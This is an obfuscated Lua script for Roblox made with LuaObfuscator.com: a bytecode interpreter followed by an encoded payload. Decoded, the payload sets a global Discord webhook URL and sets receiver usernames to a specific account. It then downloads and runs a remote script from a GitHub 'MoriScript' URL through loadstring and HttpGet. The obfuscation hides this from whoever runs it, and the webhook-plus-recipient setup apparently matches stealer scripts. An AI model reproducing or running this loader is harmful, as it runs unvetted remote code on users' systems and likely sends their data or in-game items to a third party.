--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v75=v5(v69,v19);v19=nil;return v75;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%(((880 -(282 + 595)) -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-(620 -(555 + 64)))) + ((838 + 94) -(857 + 74)))) ;return v70-(v70%(569 -(367 + (286 -85)))) ;else local v71=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v71 + v71))>=v71) and ((1066 -(68 + 997)) + 0)) or (1270 -(226 + 1044)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(118 -((58 -26) + 85))) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;v35=1;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + 4 ;return (v41 * (16777566 -(87 + 263))) + (v40 * 65536) + (v39 * (436 -(67 + 83 + 30))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,792 -(368 + 423) ,(4 + 58) -42 ) * ((2 + 0)^((463 -336) -95))) + v42 ;local v46=v20(v43,973 -(802 + 150) ,(30 + 53) -52 );local v47=((v20(v43,57 -25 )==(1 + 0)) and  -(998 -(915 + 82))) or (1 -0) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=1188 -(1069 + 118) ;v44=0 + (885 -(261 + 624)) ;end elseif (v46==(4643 -2596)) then return ((v45==0) and (v47 * ((773 -(201 + 571))/((2021 -883) -(116 + 1022))))) or (v47 * NaN) ;end return v8(v47,v46-((7943 -5706) -1214) ) * (v44 + (v45/(((860 -(814 + 45)) + (2 -1))^(92 -40)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(1423 -(630 + 793))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v67=4 -3 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=(4 -1)) then else v58=nil;v59=nil;v51=4;end if (v51~=(345 -(218 + 123))) then else while true do if (v52~=3) then else v59=nil;while true do local v94=0;local v95;while true do if (0==v94) then v95=0;while true do if (v95==(1581 -(1535 + 46))) then if (v53==(1 + 0)) then local v122=0 + 0 ;local v123;while true do if ((560 -(306 + 254))~=v122) then else v123=0 + 0 ;while true do if (v123~=2) then else v53=3 -1 ;break;end if (0==v123) then local v157=1467 -(899 + 568) ;local v158;while true do if (v157~=0) then else v158=0;while true do if (v158~=(1 + 0)) then else v123=2 -1 ;break;end if (v158==(603 -(268 + 335))) then local v176=290 -(60 + 230) ;while true do if (v176==(573 -(426 + 146))) then v158=1 + 0 ;break;end if (v176~=0) then else v58=v23();v59={};v176=1;end end end end break;end end end if (v123==(1457 -(282 + 1174))) then local v159=0;while true do if ((812 -(569 + 242))==v159) then v123=5 -3 ;break;end if (v159==(0 + 0)) then for v165=1025 -(706 + 318) ,v58 do local v166=1251 -(721 + 530) ;local v167;local v168;while true do if (v166==0) then local v177=0;local v178;while true do if (v177==(1271 -(945 + 326))) then v178=0;while true do if (v178==(0 -0)) then v167=v21();v168=nil;v178=1;end if (v178~=1) then else v166=1 + 0 ;break;end end break;end end end if ((701 -(271 + 429))==v166) then if (v167==(1 + 0)) then v168=v21()~=(1500 -(1408 + 92)) ;elseif (v167==(1088 -(461 + 625))) then v168=v24();elseif (v167~=3) then else v168=v25();end v59[v165]=v168;break;end end end v57[3]=v21();v159=1289 -(993 + 295) ;end end end end break;end end end if (v53~=(0 + 0)) then else local v124=1171 -(418 + 753) ;local v125;while true do if (0==v124) then v125=0 + 0 ;while true do if (v125==(1 + 1)) then v53=1;break;end if (v125==(1 + 0)) then local v160=0 + 0 ;while true do if (v160~=(529 -(406 + 123))) then else v56={};v57={v54,v55,nil,v56};v160=1;end if (v160~=1) then else v125=2;break;end end end if (v125==0) then v54={};v55={};v125=1;end end break;end end end v95=1;end if (v95==(1323 -(1249 + 73))) then if (v53==2) then local v126=0;while true do local v148=0;while true do if (0==v148) then if (v126~=1) then else return v57;end if (0==v126) then local v161=0 + 0 ;while true do if (v161==1) then v126=1;break;end if (v161~=(1145 -(466 + 679))) then else for v169=2 -1 ,v23() do local v170=0 -0 ;local v171;local v172;local v173;while true do if (v170==(1901 -(106 + 1794))) then v173=nil;while true do if (v171==(0 + 0)) then v172=0;v173=nil;v171=1;end if ((1 + 0)==v171) then while true do if (v172==0) then v173=v21();if (v20(v173,1,2 -1 )==0) then local v180=0;local v181;local v182;local v183;local v184;local v185;local v186;while true do if (v180==(2 -1)) then v183=nil;v184=nil;v180=116 -(4 + 110) ;end if (v180~=(584 -(57 + 527))) then else v181=1427 -(41 + 1386) ;v182=nil;v180=1;end if (2~=v180) then else v185=nil;v186=nil;v180=3;end if (v180==(106 -(17 + 86))) then while true do if (v181==1) then local v187=0;while true do if (1==v187) then v181=2;break;end if (v187==(0 + 0)) then v184=nil;v185=nil;v187=1 -0 ;end end end if (2~=v181) then else v186=nil;while true do if (v182==(2 -1)) then local v189=166 -(122 + 44) ;while true do if ((0 -0)~=v189) then else v185=nil;v186=nil;v189=3 -2 ;end if (v189==1) then v182=2 + 0 ;break;end end end if (v182~=2) then else while true do if (v183==1) then local v190=0 + 0 ;while true do if (0==v190) then local v199=0;while true do if (v199~=(0 -0)) then else v186={v22(),v22(),nil,nil};if (v184==(0 + 0)) then local v201=1257 -(1043 + 214) ;local v202;while true do if (v201==0) then v202=0 -0 ;while true do if (v202==0) then v186[1215 -(323 + 889) ]=v22();v186[10 -6 ]=v22();break;end end break;end end elseif (v184==1) then v186[3]=v23();elseif (v184==2) then v186[583 -(361 + 219) ]=v23() -((322 -(53 + 267))^(4 + 12)) ;elseif (v184==3) then local v211=0;local v212;local v213;while true do if ((414 -(15 + 398))~=v211) then else while true do if (v212==0) then v213=982 -(18 + 964) ;while true do if (v213~=0) then else v186[11 -8 ]=v23() -(2^(10 + 6)) ;v186[3 + 1 ]=v22();break;end end break;end end break;end if (v211==0) then v212=0;v213=nil;v211=851 -(20 + 830) ;end end end v199=1;end if (1~=v199) then else v190=1 + 0 ;break;end end end if (v190==(127 -(116 + 10))) then v183=1 + 1 ;break;end end end if (v183==(740 -(542 + 196))) then local v191=0;local v192;local v193;while true do if (v191==(1 -0)) then while true do if (v192~=(0 + 0)) then else v193=0 + 0 ;while true do if (v193~=0) then else if (v20(v185,1 + 0 ,1)==(2 -1)) then v186[4 -2 ]=v59[v186[1553 -(1126 + 425) ]];end if (v20(v185,407 -(118 + 287) ,7 -5 )==1) then v186[1124 -(118 + 1003) ]=v59[v186[8 -5 ]];end v193=378 -(142 + 235) ;end if ((4 -3)==v193) then v183=3;break;end end break;end end break;end if (v191~=(0 + 0)) then else v192=977 -(553 + 424) ;v193=nil;v191=1;end end end if (v183==0) then local v194=0 -0 ;local v195;while true do if (v194==(0 + 0)) then v195=0 + 0 ;while true do if (v195==(0 + 0)) then local v200=0;while true do if (v200~=(0 + 0)) then else v184=v20(v173,2 + 0 ,3);v185=v20(v173,8 -4 ,6);v200=1;end if (v200~=1) then else v195=2 -1 ;break;end end end if (v195==(2 -1)) then v183=1;break;end end break;end end end if (v183==3) then if (v20(v185,3,3)~=(1 + 0)) then else v186[19 -15 ]=v59[v186[757 -(239 + 514) ]];end v54[v169]=v186;break;end end break;end if (v182==0) then v183=0 + 0 ;v184=nil;v182=1330 -(797 + 532) ;end end break;end if (v181==0) then local v188=0;while true do if (v188==1) then v181=1;break;end if (v188==0) then v182=0 + 0 ;v183=nil;v188=1;end end end end break;end end end break;end end break;end end break;end if (v170==(0 + 0)) then v171=0 -0 ;v172=nil;v170=1203 -(373 + 829) ;end end end for v174=732 -(476 + 255) ,v23() do v55[v174-(1131 -(369 + 761)) ]=v28();end v161=1;end end end break;end end end end break;end end break;end end end break;end if (v52==1) then local v93=0;while true do if (v93==(0 + 0)) then v55=nil;v56=nil;v93=1 -0 ;end if (1==v93) then v52=3 -1 ;break;end end end if (2==v52) then v57=nil;v58=nil;v52=3;end if ((238 -(64 + 174))==v52) then v53=0;v54=nil;v52=1 + 0 ;end end break;end if (v51~=(1 -0)) then else v54=nil;v55=nil;v51=338 -(144 + 192) ;end if (v51==0) then v52=216 -(42 + 174) ;v53=nil;v51=1;end if (v51==(2 + 0)) then v56=nil;v57=nil;v51=3;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v90=0,v84 do if (v90>=v78) then v82[v90-v78 ]=v83[v90 + 1 ];else v86[v90]=v83[v90 + 1 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if (v89<=10) then if (v89<=4) then if (v89<=1) then if (v89==0) then local v100=0;local v101;while true do if (v100==0) then v101=v88[2];v86[v101]=v86[v101](v13(v86,v101 + 1 ,v81));break;end end else local v102=v88[2];local v103=v86[v88[3]];v86[v102 + 1 ]=v103;v86[v102]=v103[v88[4]];end elseif (v89<=2) then v86[v88[2]]();elseif (v89>3) then v86[v88[2]]=v62[v88[3]];else v86[v88[2]]=v88[3]~=0 ;end elseif (v89<=7) then if (v89<=5) then local v107=v88[2];local v108,v109=v79(v86[v107](v13(v86,v107 + 1 ,v88[3])));v81=(v109 + v107) -1 ;local v110=0;for v119=v107,v81 do v110=v110 + 1 ;v86[v119]=v108[v110];end elseif (v89==6) then v86[v88[2]]=v88[3];else do return;end end elseif (v89<=8) then v80=v88[3];elseif (v89==9) then v86[v88[2]]=v62[v88[3]];else local v134=0;local v135;while true do if (v134==0) then v135=v88[2];v86[v135]=v86[v135](v13(v86,v135 + 1 ,v81));break;end end end elseif (v89<=15) then if (v89<=12) then if (v89==11) then v86[v88[2]][v88[3]]=v88[4];else v86[v88[2]]=v88[3];end elseif (v89<=13) then v86[v88[2]][v88[3]]=v88[4];elseif (v89>14) then local v136=v88[2];local v137=v86[v88[3]];v86[v136 + 1 ]=v137;v86[v136]=v137[v88[4]];else do return;end end elseif (v89<=18) then if (v89<=16) then if (v86[v88[2]]==v88[4]) then v80=v80 + 1 ;else v80=v88[3];end elseif (v89==17) then if (v86[v88[2]]==v88[4]) then v80=v80 + 1 ;else v80=v88[3];end else local v142=0;local v143;local v144;local v145;local v146;while true do if (1==v142) then v81=(v145 + v143) -1 ;v146=0;v142=2;end if (v142==2) then for v155=v143,v81 do local v156=0;while true do if (v156==0) then v146=v146 + 1 ;v86[v155]=v144[v146];break;end end end break;end if (v142==0) then v143=v88[2];v144,v145=v79(v86[v143](v13(v86,v143 + 1 ,v88[3])));v142=1;end end end elseif (v89<=19) then v86[v88[2]]=v88[3]~=0 ;elseif (v89>20) then v80=v88[3];else v86[v88[2]]();end v80=v80 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132303138363335303634323134373430382F437974462O7039426269655354702O766C654564376957764571776A56314C3445537537317938477A636B6C5564495F2O4633494C764659706B2D6E4E2D7A6347636C79030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030E3O0049747A5F4A61786F6E506C61797A03093O00557365724E616D653200173O0012063O00013O0026113O000E000100020004083O000E0001001204000100033O00300D000100040005001204000100063O001204000200073O00200F000200020008001206000400094O0003000500014O0005000200054O000A00013O00022O00020001000100010004083O001600010026113O0001000100010004083O00010001001204000100033O00300D0001000A000B001204000100033O00300D0001000C000B0012063O00023O0004083O000100012O00073O00017O00",v9(),...);end
